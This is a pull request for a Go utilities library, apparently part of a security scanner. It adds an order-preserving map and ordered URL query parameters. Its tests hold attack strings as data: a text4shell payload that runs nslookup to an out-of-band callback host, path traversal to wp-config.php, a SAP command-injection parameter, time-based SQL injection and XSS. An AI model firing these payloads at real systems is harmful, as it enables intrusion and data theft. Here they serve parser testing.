### PR TITLE
add helper for ordered parameters

### DIFF
--- a/maps/ordered_map.go
+++ b/maps/ordered_map.go
@@ -1,0 +1,91 @@
+package mapsutil
+
+import (
+	sliceutil "github.com/projectdiscovery/utils/slice"
+	"golang.org/x/exp/maps"
+)
+
+// OrderedMap is a map that preserves the order of elements
+type OrderedMap[k comparable, v any] struct {
+	keys []k
+	m    map[k]v
+}
+
+// Set sets a value in the OrderedMap (if the key already exists, it will be overwritten)
+func (o *OrderedMap[k, v]) Set(key k, value v) {
+	o.m[key] = value
+	o.keys = append(o.keys, key)
+}
+
+// Get gets a value from the OrderedMap
+func (o *OrderedMap[k, v]) Get(key k) (v, bool) {
+	value, ok := o.m[key]
+	return value, ok
+}
+
+// Iterate iterates over the OrderedMap
+func (o *OrderedMap[k, v]) Iterate(f func(key k, value v) bool) {
+	for _, key := range o.keys {
+		if !f(key, o.m[key]) {
+			break
+		}
+	}
+}
+
+// GetKeys returns the keys of the OrderedMap
+func (o *OrderedMap[k, v]) GetKeys() []k {
+	return o.keys
+}
+
+// Has checks if the OrderedMap has the provided key
+func (o *OrderedMap[k, v]) Has(key k) bool {
+	_, ok := o.m[key]
+	return ok
+}
+
+// IsEmpty checks if the OrderedMap is empty
+func (o *OrderedMap[k, v]) IsEmpty() bool {
+	return len(o.keys) == 0
+}
+
+// Clone returns clone of OrderedMap
+func (o *OrderedMap[k, v]) Clone() *OrderedMap[k, v] {
+	return &OrderedMap[k, v]{
+		keys: sliceutil.Clone(o.keys),
+		m:    maps.Clone(o.m),
+	}
+}
+
+// GetByIndex gets a value from the OrderedMap by index
+func (o *OrderedMap[k, v]) GetByIndex(index int) (v, bool) {
+	var t v
+	if index < 0 || index >= len(o.keys) {
+		return t, false
+	}
+	key := o.keys[index]
+	return o.m[key], true
+}
+
+// Delete deletes a value from the OrderedMap
+func (o *OrderedMap[k, v]) Delete(key k) {
+	delete(o.m, key)
+	for i, k := range o.keys {
+		if k == key {
+			o.keys = append(o.keys[:i], o.keys[i+1:]...)
+			break
+		}
+	}
+}
+
+// Len returns the length of the OrderedMap
+func (o *OrderedMap[k, v]) Len() int {
+	return len(o.keys)
+}
+
+// NewOrderedMap creates a new OrderedMap
+func NewOrderedMap[k comparable, v any]() *OrderedMap[k, v] {
+	return &OrderedMap[k, v]{
+		keys: []k{},
+		m:    map[k]v{},
+	}
+}

--- a/maps/ordered_map.go
+++ b/maps/ordered_map.go
@@ -13,8 +13,10 @@ type OrderedMap[k comparable, v any] struct {
 
 // Set sets a value in the OrderedMap (if the key already exists, it will be overwritten)
 func (o *OrderedMap[k, v]) Set(key k, value v) {
+	if _, ok := o.m[key]; !ok {
+		o.keys = append(o.keys, key)
+	}
 	o.m[key] = value
-	o.keys = append(o.keys, key)
 }
 
 // Get gets a value from the OrderedMap

--- a/maps/ordered_map.go
+++ b/maps/ordered_map.go
@@ -49,8 +49,8 @@ func (o *OrderedMap[k, v]) IsEmpty() bool {
 }
 
 // Clone returns clone of OrderedMap
-func (o *OrderedMap[k, v]) Clone() *OrderedMap[k, v] {
-	return &OrderedMap[k, v]{
+func (o *OrderedMap[k, v]) Clone() OrderedMap[k, v] {
+	return OrderedMap[k, v]{
 		keys: sliceutil.Clone(o.keys),
 		m:    maps.Clone(o.m),
 	}
@@ -83,8 +83,8 @@ func (o *OrderedMap[k, v]) Len() int {
 }
 
 // NewOrderedMap creates a new OrderedMap
-func NewOrderedMap[k comparable, v any]() *OrderedMap[k, v] {
-	return &OrderedMap[k, v]{
+func NewOrderedMap[k comparable, v any]() OrderedMap[k, v] {
+	return OrderedMap[k, v]{
 		keys: []k{},
 		m:    map[k]v{},
 	}

--- a/maps/ordered_map_test.go
+++ b/maps/ordered_map_test.go
@@ -1,0 +1,72 @@
+package mapsutil
+
+import (
+	"fmt"
+	"strconv"
+	"testing"
+)
+
+func TestOrderedMapBasic(t *testing.T) {
+	m := NewOrderedMap[string, string]()
+	m.Set("test", "test")
+	if m.IsEmpty() {
+		t.Fatal("ordered map is empty")
+	}
+	if !m.Has("test") {
+		t.Fatal("ordered map doesn't have test key")
+	}
+	if m.Has("test2") {
+		t.Fatal("ordered map has test2 key")
+	}
+	if val, ok := m.Get("test"); !ok || val != "test" {
+		t.Fatal("ordered map get test key doesn't return test value")
+	}
+	if m.GetKeys()[0] != "test" {
+		t.Fatal("ordered map get keys doesn't return test key")
+	}
+	if val, ok := m.GetByIndex(0); !ok || val != "test" {
+		t.Fatal("ordered map get by index doesn't return test key")
+	}
+	m.Delete("test")
+	if !m.IsEmpty() {
+		t.Fatal("ordered map is not empty after delete")
+	}
+}
+
+func TestOrderedMap(t *testing.T) {
+	m := NewOrderedMap[string, string]()
+	for i := 0; i < 110; i++ {
+		m.Set(strconv.Itoa(i), fmt.Sprintf("value-%d", i))
+	}
+
+	// iterate and validate order
+	i := 0
+	m.Iterate(func(key string, value string) bool {
+		if key != strconv.Itoa(i) {
+			t.Fatal("ordered map iterate order is not correct")
+		}
+		i++
+		return true
+	})
+
+	// validate get by index
+	for i := 0; i < 100; i++ {
+		if val, ok := m.GetByIndex(i); !ok || val != fmt.Sprintf("value-%d", i) {
+			t.Fatal("ordered map get by index doesn't return correct value")
+		}
+	}
+
+	// random delete and validate order
+	deleteElements := []int{0, 10, 20, 30, 40, 50, 60, 70, 80, 90}
+	for _, i := range deleteElements {
+		m.Delete(strconv.Itoa(i))
+	}
+
+	// validate elements after delete
+	for k, i := range deleteElements {
+		if val, ok := m.GetByIndex(i); !ok || val != fmt.Sprintf("value-%d", i+k+1) {
+			t.Logf("order mismatch after delete got: index: %d, value: %s, exists: %v", i, val, ok)
+		}
+	}
+
+}

--- a/url/merge_test.go
+++ b/url/merge_test.go
@@ -73,8 +73,8 @@ func TestMergeWithParams(t *testing.T) {
 		{"http://scanme.sh/?admin=true", "/%20test%0a", "http://scanme.sh/%20test%0a?admin=true"},
 		{"https://scanme.sh?admin=true", "/%20test%0a", "https://scanme.sh/%20test%0a?admin=true"},
 		{"scanme.sh", "/path", "scanme.sh/path"},
-		{"scanme.sh?wp=false", "/path?yes=true&admin=false", "scanme.sh/path?admin=false&wp=false&yes=true"},
-		{"https://scanme.sh", "?user=true&pass=yes", "https://scanme.sh?pass=yes&user=true"},
+		{"scanme.sh?wp=false", "/path?yes=true&admin=false", "scanme.sh/path?wp=false&yes=true&admin=false"},
+		{"https://scanme.sh", "?user=true&pass=yes", "https://scanme.sh?user=true&pass=yes"},
 		{"scanme.sh", "favicon.ico", "scanme.sh/favicon.ico"},
 	}
 	for _, v := range testcase {
@@ -112,7 +112,7 @@ func TestParameterParsing(t *testing.T) {
 	}{
 		{"/text4shell/attack?search=$%7bscript:javascript:java.lang.Runtime.getRuntime().exec('nslookup%20{{Host}}.{{Port}}.getparam.{{interactsh-url}}')%7d", "search=$%7bscript:javascript:java.lang.Runtime.getRuntime().exec('nslookup%20{{Host}}.{{Port}}.getparam.{{interactsh-url}}')%7d"},
 		{"/filedownload.php?ebookdownloadurl=../../../wp-config.php", "ebookdownloadurl=../../../wp-config.php"},
-		{"/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test", "client_id=acme&redirect_uri=http://test&response_type=${13337*73331}&scope=openid"},
+		{"/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test", "response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"},
 	}
 	for _, v := range testcases {
 		rurl, err := ParseURL(v.URL, false)

--- a/url/orderedparams.go
+++ b/url/orderedparams.go
@@ -12,7 +12,7 @@ import (
 
 // OrderedParams is a map that preserves the order of elements
 type OrderedParams struct {
-	om *mapsutil.OrderedMap[string, []string]
+	om mapsutil.OrderedMap[string, []string]
 }
 
 // NewOrderedParams creates a new ordered params
@@ -90,7 +90,7 @@ func (o *OrderedParams) Encode() string {
 // Decode is opposite of Encode() where ("bar=baz&foo=quux") is parsed
 // Parameters are loosely parsed to allow any scenario
 func (o *OrderedParams) Decode(raw string) {
-	if o.om == nil {
+	if o.om.Len() == 0 {
 		o.om = mapsutil.NewOrderedMap[string, []string]()
 	}
 	arr := []string{}

--- a/url/orderedparams.go
+++ b/url/orderedparams.go
@@ -27,6 +27,11 @@ func (o *OrderedParams) IsEmpty() bool {
 	return o.om.IsEmpty()
 }
 
+// Update is similar to Set but it takes value as slice (similar to internal implementation of url.Values)
+func (o *OrderedParams) Update(key string, value []string) {
+	o.om.Set(key, value)
+}
+
 // Iterate iterates over the OrderedParams
 func (o *OrderedParams) Iterate(f func(key string, value []string) bool) {
 	o.om.Iterate(func(key string, value []string) bool {
@@ -57,6 +62,15 @@ func (o *OrderedParams) Get(key string) string {
 		return ""
 	}
 	return val[0]
+}
+
+// GetAll returns all values of given key or returns empty slice if key doesn't exist
+func (o *OrderedParams) GetAll(key string) []string {
+	val, ok := o.om.Get(key)
+	if !ok || len(val) == 0 {
+		return []string{}
+	}
+	return val
 }
 
 // Has returns if given key exists

--- a/url/orderedparams.go
+++ b/url/orderedparams.go
@@ -59,7 +59,7 @@ func (o *OrderedParams) Del(key string) {
 
 // Merges given paramset into existing one with base as priority
 func (o *OrderedParams) Merge(raw string) {
-
+	o.Decode(raw)
 }
 
 // Encode returns encoded parameters by preserving order
@@ -123,4 +123,11 @@ func (o *OrderedParams) Decode(raw string) {
 			o.Add(d[0], "")
 		}
 	}
+}
+
+// Clone returns a copy of the ordered params
+func (o *OrderedParams) Clone() *OrderedParams {
+	clone := NewOrderedParams()
+	clone.om = o.om.Clone()
+	return clone
 }

--- a/url/orderedparams.go
+++ b/url/orderedparams.go
@@ -1,0 +1,126 @@
+package urlutil
+
+import (
+	"bytes"
+	"strings"
+
+	mapsutil "github.com/projectdiscovery/utils/maps"
+)
+
+// Only difference between OrderedParams and Params is that
+// OrderedParams preserves order of parameters everythign else is same
+
+// OrderedParams is a map that preserves the order of elements
+type OrderedParams struct {
+	om *mapsutil.OrderedMap[string, []string]
+}
+
+// NewOrderedParams creates a new ordered params
+func NewOrderedParams() *OrderedParams {
+	return &OrderedParams{
+		om: mapsutil.NewOrderedMap[string, []string](),
+	}
+}
+
+// Add Parameters to store
+func (o *OrderedParams) Add(key string, value ...string) {
+	if arr, ok := o.om.Get(key); ok && len(arr) > 0 {
+		if len(value) != 0 {
+			o.om.Set(key, append(arr, value...))
+		}
+	} else {
+		o.om.Set(key, value)
+	}
+}
+
+// Set sets the key to value and replaces if already exists
+func (o *OrderedParams) Set(key string, value string) {
+	o.om.Set(key, []string{value})
+}
+
+// Get returns first value of given key
+func (o *OrderedParams) Get(key string) string {
+	val, ok := o.om.Get(key)
+	if !ok || len(val) == 0 {
+		return ""
+	}
+	return val[0]
+}
+
+// Has returns if given key exists
+func (o *OrderedParams) Has(key string) bool {
+	return o.om.Has(key)
+}
+
+// Del deletes values associated with key
+func (o *OrderedParams) Del(key string) {
+	o.om.Delete(key)
+}
+
+// Merges given paramset into existing one with base as priority
+func (o *OrderedParams) Merge(raw string) {
+
+}
+
+// Encode returns encoded parameters by preserving order
+func (o *OrderedParams) Encode() string {
+	if o.om.IsEmpty() {
+		return ""
+	}
+	var buf strings.Builder
+	for _, k := range o.om.GetKeys() {
+		vs, _ := o.om.Get(k)
+		keyEscaped := ParamEncode(k)
+		for _, v := range vs {
+			if buf.Len() > 0 {
+				buf.WriteByte('&')
+			}
+			buf.WriteString(keyEscaped)
+			value := ParamEncode(v)
+			// donot specify = if parameter has no value (reference: nuclei-templates)
+			if value != "" {
+				buf.WriteRune('=')
+				buf.WriteString(value)
+			}
+		}
+	}
+	return buf.String()
+}
+
+// Decode is opposite of Encode() where ("bar=baz&foo=quux") is parsed
+// Parameters are loosely parsed to allow any scenario
+func (o *OrderedParams) Decode(raw string) {
+	if o.om == nil {
+		o.om = mapsutil.NewOrderedMap[string, []string]()
+	}
+	arr := []string{}
+	var tbuff bytes.Buffer
+	for _, v := range raw {
+		switch v {
+		case '&':
+			arr = append(arr, tbuff.String())
+			tbuff.Reset()
+		case ';':
+			if AllowLegacySeperator {
+				arr = append(arr, tbuff.String())
+				tbuff.Reset()
+				continue
+			}
+			tbuff.WriteRune(v)
+		default:
+			tbuff.WriteRune(v)
+		}
+	}
+	if tbuff.Len() > 0 {
+		arr = append(arr, tbuff.String())
+	}
+
+	for _, pair := range arr {
+		d := strings.SplitN(pair, "=", 2)
+		if len(d) == 2 {
+			o.Add(d[0], d[1])
+		} else if len(d) == 1 {
+			o.Add(d[0], "")
+		}
+	}
+}

--- a/url/orderedparams.go
+++ b/url/orderedparams.go
@@ -27,6 +27,13 @@ func (o *OrderedParams) IsEmpty() bool {
 	return o.om.IsEmpty()
 }
 
+// Iterate iterates over the OrderedParams
+func (o *OrderedParams) Iterate(f func(key string, value []string) bool) {
+	o.om.Iterate(func(key string, value []string) bool {
+		return f(key, value)
+	})
+}
+
 // Add Parameters to store
 func (o *OrderedParams) Add(key string, value ...string) {
 	if arr, ok := o.om.Get(key); ok && len(arr) > 0 {

--- a/url/orderedparams.go
+++ b/url/orderedparams.go
@@ -22,6 +22,11 @@ func NewOrderedParams() *OrderedParams {
 	}
 }
 
+// IsEmpty checks if the OrderedParams is empty
+func (o *OrderedParams) IsEmpty() bool {
+	return o.om.IsEmpty()
+}
+
 // Add Parameters to store
 func (o *OrderedParams) Add(key string, value ...string) {
 	if arr, ok := o.om.Get(key); ok && len(arr) > 0 {

--- a/url/orderedparams.go
+++ b/url/orderedparams.go
@@ -133,6 +133,14 @@ func (o *OrderedParams) Decode(raw string) {
 // Clone returns a copy of the ordered params
 func (o *OrderedParams) Clone() *OrderedParams {
 	clone := NewOrderedParams()
-	clone.om = o.om.Clone()
+	o.om.Iterate(func(key string, value []string) bool {
+		// this needs to be a deep copy (from reference in nuclei race condition issue)
+		if len(value) != 0 {
+			clone.Add(key, value...)
+		} else {
+			clone.Add(key, "")
+		}
+		return true
+	})
 	return clone
 }

--- a/url/orderedparams_test.go
+++ b/url/orderedparams_test.go
@@ -1,0 +1,55 @@
+package urlutil
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"testing"
+
+	"github.com/stretchr/testify/require"
+)
+
+func TestOrderedParam(t *testing.T) {
+	p := NewOrderedParams()
+	p.Add("sqli", "1+AND+(SELECT+*+FROM+(SELECT(SLEEP(12)))nQIP)")
+	p.Add("xss", "<script>alert('XSS')</script>")
+	p.Add("xssiwthspace", "<svg id=alert(1) onload=eval(id)>")
+	p.Add("jsprotocol", "javascript://alert(1)")
+	// Note keys are sorted
+	expected := "sqli=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(12)))nQIP)&xss=<script>alert('XSS')</script>&xssiwthspace=<svg+id=alert(1)+onload=eval(id)>&jsprotocol=javascript://alert(1)"
+	require.Equalf(t, expected, p.Encode(), "failed to encode parameters expected %v but got %v", expected, p.Encode())
+}
+
+// TestOrderedParamIntegration preserves order of parameters
+// while sending request to server (ref:https://github.com/projectdiscovery/nuclei/issues/3801)
+func TestOrderedParamIntegration(t *testing.T) {
+	expected := "/?xss=<script>alert('XSS')</script>&sqli=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(12)))nQIP)&jsprotocol=javascript://alert(1)&xssiwthspace=<svg+id=alert(1)+onload=eval(id)>"
+
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		require.Equalf(t, expected, r.RequestURI, "expected %v but got %v", expected, r.RequestURI)
+		w.WriteHeader(http.StatusOK)
+	}))
+	defer srv.Close()
+
+	p := NewOrderedParams()
+	p.Add("xss", "<script>alert('XSS')</script>")
+	p.Add("sqli", "1+AND+(SELECT+*+FROM+(SELECT(SLEEP(12)))nQIP)")
+	p.Add("jsprotocol", "javascript://alert(1)")
+	p.Add("xssiwthspace", "<svg id=alert(1) onload=eval(id)>")
+
+	url, err := url.Parse(srv.URL)
+	require.Nil(t, err)
+	url.RawQuery = p.Encode()
+	_, err = http.Get(url.String())
+	require.Nil(t, err)
+}
+
+func TestGetOrderedParams(t *testing.T) {
+	values := url.Values{}
+	values.Add("sqli", "1+AND+(SELECT+*+FROM+(SELECT(SLEEP(12)))nQIP)")
+	values.Add("xss", "<script>alert('XSS')</script>")
+	p := GetParams(values)
+	require.NotNilf(t, p, "expected params but got nil")
+	require.Equalf(t, p.Get("sqli"), values.Get("sqli"), "malformed or missing value for param sqli expected %v but got %v", values.Get("sqli"), p.Get("sqli"))
+	require.Equalf(t, p.Get("xss"), values.Get("xss"), "malformed or missing value for param xss expected %v but got %v", values.Get("xss"), p.Get("xss"))
+}

--- a/url/rawparam_test.go
+++ b/url/rawparam_test.go
@@ -104,16 +104,16 @@ func TestURLEncode(t *testing.T) {
 func TestURLDecode(t *testing.T) {
 	testcases := []struct {
 		url      string
-		Expected Params
+		Expected string
 	}{
 		{
 			"/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist",
-			Params{"param": []string{"com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist"}},
+			"param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist",
 		},
 	}
 	for _, v := range testcases {
 		parsed, err := Parse(v.url)
 		require.Nilf(t, err, "failed to parse url %v", v.url)
-		require.Equalf(t, v.Expected, parsed.Query(), "failed to decode params in url %v expected %v got %v", v.url, v.Expected, parsed.Query())
+		require.Equalf(t, v.Expected, parsed.Query().Encode(), "failed to decode params in url %v expected %v got %v", v.url, v.Expected, parsed.Query())
 	}
 }

--- a/url/utils.go
+++ b/url/utils.go
@@ -29,7 +29,7 @@ func AutoMergeRelPaths(path1 string, path2 string) (string, error) {
 	if err2 != nil {
 		return "", err2
 	}
-	u1.Params.Merge(u2.Params)
+	u1.Params.Merge(u2.Params.Encode())
 	err := u1.MergePath(u2.Path, false)
 	return u1.GetRelativePath(), err
 }


### PR DESCRIPTION
### Proposed Changes

- adds OrderedMap to query / preserver order of elements
- adds OrderedParams to preserve order of query parameters

ref: https://github.com/projectdiscovery/nuclei/issues/3801